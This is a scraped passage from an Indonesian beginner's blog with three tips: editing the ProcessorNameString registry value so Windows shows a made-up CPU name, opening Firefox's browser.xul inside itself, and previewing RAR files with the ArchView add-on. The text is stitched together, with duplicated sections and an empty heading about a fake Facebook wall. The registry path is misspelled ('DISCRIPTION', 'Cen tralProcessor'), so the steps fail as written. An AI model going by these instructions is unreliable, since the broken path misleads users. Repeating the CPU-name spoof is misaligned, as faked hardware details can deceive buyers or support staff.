HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\
atau
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\0\
atau
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\1\
3. Cari key dengan nama ProcessorNameString
4. Klik kanan key tersebut lalu pilih Modify dan ubah Value Data tersebut sesuai keinginanmu (Contoh : Intel Pentium Dual CPU E2200 @ 2.20GHz atau yang lain).
lihat perubahannya di System Properties (klik kanan icon My Computer dan pilih Properties ).
untuk mengembalikannya masuk ke lokasi tadi,ubah nama seperti semula..
selamat mencoba dan Belajar
Mozilla in Mozilla
ketemu lagi dengan ane yang newbie ini,,,
* afifzi cuma mau sekedar share, klo repost silahkan di hapus aja
langsung aja copy code ini di address bar firefox kalian
Code:
chrome://browser/content/browser.xul
setelah itu tekan Enter deh,,,
Selesai
sampai ketemu lagi dengan ane lagi ya,,
* afifzi cuma mau sekedar share, klo repost silahkan di hapus aja
langsung aja copy code ini di address bar firefox kalian
Code:
chrome://browser/content/browser.xul
setelah itu tekan Enter deh,,,
Selesai
sampai ketemu lagi dengan ane lagi ya,,
Membuat Wall Palsu pada Facebook
Minggu, 30 Oktober 2011
Melihat Isi file RAR Sebelum di Download
* afifzi cuma sekedar mau share, semoga bisa bermanfaat
langsung saja CEKIDOT
========================================================================
untuk lebih hati" mendownload supaya tidak kena tipu sebaiknya kita lihat isi file rar yg ingin kita download tersebut
disini syaratnya harus menggunakan browser mozilla firefox,
1. buka https://addons.mozilla.org/en-US/firefox/ dan kita search archview
2. Setelah keluar hasilnya klik add to firefox
3. kemudian klik install now

4. Setelah selesai proses instalasinya restart firefox anda
5. Oke, sekarang tinggal kita cari file yg ingin kita download misal saja sperti ini
6. tinggal klik download dan isi dari file rar tersebut dapat kita lihat
========================================================================
sekian dulu ya tutorial singkat dari ane yg masih newbie
sampai ketemu lagi :D
langsung saja CEKIDOT
========================================================================
untuk lebih hati" mendownload supaya tidak kena tipu sebaiknya kita lihat isi file rar yg ingin kita download tersebut
disini syaratnya harus menggunakan browser mozilla firefox,
1. buka https://addons.mozilla.org/en-US/firefox/ dan kita search archview
2. Setelah keluar hasilnya klik add to firefox
3. kemudian klik install now
4. Setelah selesai proses instalasinya restart firefox anda
5. Oke, sekarang tinggal kita cari file yg ingin kita download misal saja sperti ini
6. tinggal klik download dan isi dari file rar tersebut dapat kita lihat
========================================================================
sekian dulu ya tutorial singkat dari ane yg masih newbie
sampai ketemu lagi :D
Langganan:
Postingan (Atom)